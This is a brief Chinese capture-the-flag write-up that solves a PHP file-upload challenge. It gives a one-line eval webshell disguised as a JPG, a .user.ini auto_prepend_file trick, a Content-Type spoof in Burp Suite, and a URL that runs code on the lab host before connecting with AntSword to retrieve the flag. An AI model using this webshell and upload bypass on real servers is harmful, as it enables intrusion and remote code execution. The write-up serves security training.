目录
场景环境
先写一个一句话木马保存为jpg格式
<?PHP @eval($_REQUEST['ymmy']);?>
再创建一个后缀名为.ini格式的文件
auto_prepend_file=ymmy.jpg
.user.ini:用户配置文件
auto_prepndend file--指定在每个PHP页面执行前所要执行的代码。
文件上传bp抓包,改包
打开bp浏览器访问场景地址,上传.user.ini文件,查看bp的数据包,ctel+R发到Repeater模块
将 Content-Type: application/octet-stream 修改为 Content-Type: image/jpg
再上传一句话木马
看下抓到的数据包里面有上传文件的路径
通过/uploads/index.php路径访问上传的文件
已经上传成功了
复查上传文件
再次检查下上传的.user.ini、ymmy.jpg文件
http://61.147.171.105:51150//uploads/ymmy.jpg
http://61.147.171.105:51150//uploads/.user.ini
再看下php文件
http://61.147.171.105:51150//uploads/index.php?ymmy=phpinfo();
蚁剑连接
链接完双击打开 flag就在根目录的最下面
查看flag